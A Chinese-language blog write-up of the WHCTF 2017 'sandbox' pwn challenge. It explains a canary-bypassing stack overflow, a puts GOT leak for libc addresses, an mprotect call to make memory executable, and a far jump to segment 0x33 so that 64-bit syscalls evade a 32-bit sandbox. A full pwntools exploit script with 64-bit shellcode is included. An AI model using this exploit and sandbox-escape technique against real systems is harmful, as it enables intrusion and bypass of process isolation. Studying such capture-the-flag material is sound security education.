pwn学习之三

whctf2017的一道pwn题sandbox,这道题提供了两个可执行文件加一个libc,两个可执行文件是一个vuln,一个sandbox,这是一道通过沙盒去保护vuln不被攻击的题目。

用ida打开vuln:

进入80485CB函数:

这里s给的空间是48但是输入是直到换行停止,这里就存在了栈溢出。但是这道题目开了CANARY,所以不能直接覆盖到返回地址。注意到这题,s的空间下面就是v5,而v5是控制写到s的位置,所以可以通过覆盖v5到返回地址而绕过修改那段Cookie,在不开sandbox的情况下拿shell的办法为:

1.覆盖返回地址为puts函数的plt表地址,由于这样跳转少了一个call函数也就是没有push返回地址,所以对于puts函数执行完的返回地址就是进入这个函数时的esp地址的下一个地址,然后再下一个地址就是puts函数的参数,第一次提交'a'*0x30+p8(0x48)+p32(puts_plt)+p32(main_addr)+p32(puts_got)这样就会在执行到函数retn时去执行puts(puts_got)然后再返回到main函数中去。

2.拿到了puts函数的实际地址再通过libc文件去拿到system函数的实际地址,再到第二次输入把/bin/sh写到内存中去,也就是调用read函数,提交'a'*0x30+p8(0x48)+p32(read_plt)+p32(main_addr)+p32(0)+p32(0x0804a02c),这样在执行完函数时会返回到read函数,接着输入'/bin/sh'就将字符串写到了0x0804a02c里。

3.最后调用system函数,参数为0x0804a02c即可拿到shell。

sandbox程序通过系统调用号限制了一些函数的使用,如execve、open、clone、vfork、create、opennat等,同时还会不停杀死新的进程。要绕过沙盒要知道两点,一是32位的系统调用号和64位的系统调用号不同,二是可以在32位进程中使用64位的系统调用要用到CS寄存器。

在CPU处于保护模式下运行时,CS其实是段选择器,通过CS的值去找描述符表内对应的代码段基址。这里参考资料:https://www.malwaretech.com/2014/02/the-0x33-segment-selector-heavens-gate.html

所以我们要做的就是把CS寄存器从0x23变成0x33,这个需要通过远跳转来实现,即jmp 0x33:addr。知道了如何跳到64位还要知道32位和64位系统调用时的情况,在32位系统中,是通过int $0x80进入系统调用,eax为系统调用号,参数依次放在ebx,ecx,edx中,而在64位系统中,是通过syscall进入系统调用,rax为系统调用号,参数依次放在rdi,rsi,rdx中。

那么这道题的解题过程为:

1,2两步同上(2中将写入/bin/sh改为写入./flag)。

3.通过puts函数实际地址和libc拿到mprotect函数的实际地址,通过mprotect函数去申请一个内存页为可读可写可执行,提交p32(mprotect_addr)+p32(main_addr)+p32(0x0804a000)+p32(0x1000)+p32(7),这样将0x0804a000变为了可执行的内存段。

4.通过read函数向0x0804a000中写入代码同时设置返回值为0x0804a000,这样read函数运行完后即可到0x0804a000去执行写入的代码(这里由于sandbox会不断的杀死新的进程,所以并没有使用execve函数而是使用了open,read,write函数将flag文件读取到终端上显示)。

exp:

 1 from pwn import *
 2 context(arch='i386',os='linux',endian='little')
 3 context.log_level='debug'
 4                                                                                                                                       
 5 def game_start(p,libc):
 6     puts_plt=0x08048470
 7     puts_got=0x0804A018
 8     main_addr=0x0804865B
 9     read_plt=0x08048440
10     payload='a'*48+p8(0x48)+p32(puts_plt)+p32(main_addr)+p32(puts_got)
11     p.sendline(payload)
12     print p.recvline()
13     re = p.recv()
14     puts_addr = u32(re[:4])
15     print hex(puts_addr)
16     data_addr = 0x0804A02C
17     payload='a'*48+p8(0x48)
18     system_addr = puts_addr-libc.symbols['puts']+libc.symbols['system']
19     mprotect_addr = puts_addr-libc.symbols['puts']+libc.symbols['mprotect']
20     print hex(system_addr)
21     payload+=p32(read_plt)+p32(main_addr)+p32(0)+p32(data_addr)+p32(0x40)
22     p.sendline(payload)
23     print 'before:'+p.recvline()
24 
25     p.send('./flag')
26     payload='a'*48+p8(0x48)
27     payload+=p32(mprotect_addr)+p32(main_addr)+p32(0x0804a000)+p32(0x1000)+p32(7)
28     p.sendline(payload)
29     print 'third puts s:'+p.recvline()
30     payload='a'*48+p8(0x48)
31     payload+=p32(read_plt)+p32(0x0804ab00)+p32(0)+p32(0x0804ab00)+p32(0x200)
32     p.sendline(payload)
33     print 'fourth puts s:'+p.recvline()
34     payload=asm('jmp 0x33:0x0804ab20',arch='i386').ljust(0x20,'\x90')
35     shellcode64 = '''
36     BITS 64
37     org 0x0804ab20
38     mov rdi, 0x0804a02c
39     xor rsi, rsi
40     mov rax, 2
41     syscall
42     mov rdi, rax
43     mov rax, 0
44     mov rsi, 0x0804a900
45     mov rdx, 0x100
46     syscall
47     mov rdx, rax
48     mov rdi, 1
49     mov rsi, 0x0804a900
50     mov rax, 1
51     syscall
52     mov rdi, 0
53     mov rax, 60
54     syscall
55     '''
56     f = open('shell64.asm', 'wb')
57     f.write(shellcode64.strip())
58     f.close()
59     os.popen('nasm -f bin -o shell64 shell64.asm')
60     f = open('./shell64', 'rb')
61     d2 = f.read()
62     f.close()
63     payload+=d2
64     p.sendline(payload)
65     p.interactive()
66 
67 if __name__=='__main__':
68     debug=1
69     if debug==1:
70         p=process('./vuln')
71         #p=process(['./sandbox','./vuln'])
72         libc=ELF('./libc-32.so')
73     else:
74         p=remote('118.31.18.145',20004)
75         libc=ELF('./libc.so.6')
76 
77     #gdb.attach(p,'b *0x0804863F')
78 
79 game_start(p,libc)

sandbox题目下载地址:https://files.cnblogs.com/files/lllkh/68025091-fb40-4281-83ea-230331c1448a.gz

posted @ 2017-10-27 09:40  loeklvlh  阅读(1670)  评论(0编辑  收藏  举报